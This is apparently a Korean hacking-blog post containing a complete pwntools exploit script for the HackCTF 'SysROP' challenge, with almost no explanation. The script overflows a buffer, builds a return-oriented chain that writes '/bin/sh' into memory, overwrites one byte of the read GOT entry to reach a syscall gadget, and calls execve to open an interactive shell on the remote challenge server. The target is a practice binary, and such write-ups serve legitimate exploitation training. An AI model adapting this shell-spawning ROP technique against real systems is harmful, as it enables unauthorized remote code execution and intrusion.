ii4gsp

HackCTF - SysROP 본문

시스템 해킹/HackCTF

HackCTF - SysROP

ii4gsp 2020. 5. 5. 23:05

 

 

 

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3024)
e = ELF('./sysrop')
libc = ELF('./libc.so.6')

payload = ''
payload += '\x90' * (0x10 + 0x8)
payload += p64(0x00000000004005eb)
payload += p64(8)
payload += p64(0)
payload += p64(e.bss() + 0x100)
payload += p64(e.plt['read'])
payload += p64(0x4005f2)

r.sendline(payload)
sleep(0.1)
r.send('/bin/sh\x00')
sleep(0.1)

payload = ''
payload += '\x90' * (0x10 + 0x8)
payload += p64(0x00000000004005eb)
payload += p64(1)
payload += p64(0)
payload += p64(e.got['read'])
payload += p64(e.plt['read'])
payload += p64(0x00000000004005ea)
payload += p64(59)
payload += p64(0x0)
payload += p64(e.bss() + 0x100)
payload += p64(0x0)
payload += p64(e.plt['read'])

r.sendline(payload)
sleep(0.1)
r.send('\x5e')
sleep(0.1)

r.interactive()

Exploit

 

 

 

 

'시스템 해킹 > HackCTF' 카테고리의 다른 글

HackCTF - Unexploitable #2  (0) 2020.11.26
HackCTF - RTC  (0) 2020.05.05
HackCTF - Unexploitable #1  (0) 2020.05.05
HackCTF - You are silver  (0) 2020.03.05
HackCTF - ROP  (0) 2020.02.21
Comments